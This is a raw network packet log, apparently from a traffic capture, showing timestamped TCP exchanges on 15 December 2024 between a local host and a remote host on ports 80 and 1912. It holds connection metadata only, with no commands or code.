                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.364192963 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.364260912 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.365004063 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.365040064 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.365096092 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.366138935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.366173983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.366224051 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.367253065 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.367286921 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.367351055 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.368375063 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.368408918 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.368459940 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.369450092 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.369484901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.369541883 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.370542049 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.370578051 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.371520042 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.371556997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.371582985 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.371612072 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.372621059 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.372873068 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.372930050 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.373718977 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.373754978 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.374612093 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.374669075 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.374984980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.375030994 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.375683069 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.375737906 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.376619101 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.376656055 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.376724005 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.377733946 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.377767086 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.377789974 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.377820969 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.378753901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.378788948 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.379661083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.379697084 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.379728079 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.379745960 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.380558014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.380939960 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.381664991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.381699085 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.381726027 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.381757021 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.382579088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.382612944 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.383393049 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.383450985 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.383683920 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.383750916 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.384546041 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.384583950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.385426998 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.385462046 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.385487080 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.385519028 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.386434078 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.386468887 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.387664080 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.387697935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.387727022 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.387763023 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.388547897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.388710976 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.389831066 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.389866114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.389904976 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.389935017 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.390754938 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.390805960 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.390872955 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.391751051 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.391788006 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.392512083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.392546892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.392575026 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.392601967 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.393388033 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.394088984 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.394160032 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.394516945 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.394572973 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.395509958 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.395566940 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.395652056 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.432940960 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.442528963 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.532207012 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.532315016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.532412052 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.532576084 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.532787085 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.533191919 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.533241987 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.533318996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.533365011 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.533725023 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.533916950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.534399986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.534451008 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.534545898 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.535180092 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.535228968 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.535270929 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.535317898 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.535797119 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.535943031 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.536442041 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.536499023 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.536623001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.536670923 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.537167072 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.537332058 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.537761927 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.537807941 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.537913084 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.537960052 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.538443089 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.538604021 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.539134979 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.539182901 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.539247036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.539294958 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.539942026 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.539977074 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.540524006 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.540580034 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.540633917 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.540679932 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.541207075 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.541322947 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.541810989 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.541858912 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.542028904 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.542073965 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.542612076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.542689085 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.542737961 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.543153048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.543292999 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.543858051 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.543917894 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.543977022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.544029951 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.544584990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.544728994 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.545238018 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.545285940 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.545341969 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.545388937 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.545872927 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.546005011 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.546506882 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.546555996 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.546683073 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.547362089 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.547394991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.547421932 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.547435999 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.547926903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.548069954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.548459053 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.548789024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.548824072 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.548882961 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.549247026 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.549422979 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.549998045 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.550048113 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.550149918 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.550194979 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.550713062 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.550859928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.550908089 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.551393986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.551428080 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.551942110 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.551994085 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.552048922 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.552093983 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.552691936 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.552767992 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.553306103 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.553366899 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.553406000 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.553452969 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.553934097 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.554058075 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.554580927 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.554608107 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.554728031 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.555406094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.555454969 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.555494070 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.555541992 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.556121111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.556160927 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.558592081 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.560648918 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.680588007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.934900045 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:20.066179037 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:20.239392996 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:20.551913023 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:20.650973082 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:20.651024103 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:20.651087046 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:20.651146889 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:20.651216984 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:20.725301027 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:20.770984888 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:20.965936899 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.020775080 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.044106960 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.163866997 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.163950920 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.283720970 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.283751011 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.283838034 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.403695107 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.403709888 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.403753996 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.403800011 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.403867960 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.403923988 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.404023886 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.523755074 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.523847103 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.523875952 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.523890018 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.523912907 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.523917913 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.523942947 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.523996115 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.524024963 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.643960953 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.644021988 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.983059883 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.983117104 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.983175039 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.983208895 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.983246088 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.983264923 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.983280897 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.983369112 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.983467102 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.983501911 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.983516932 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.983537912 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.983793020 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.103456020 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.103502035 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.103579998 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.112698078 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.123286963 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.175282001 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.175360918 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.175436020 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.179454088 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.179564953 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.179614067 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.188874006 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.189049959 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.189110994 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.197135925 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.197299004 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.197360992 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.205640078 CET8049720185.81.68.147192.168.2.5
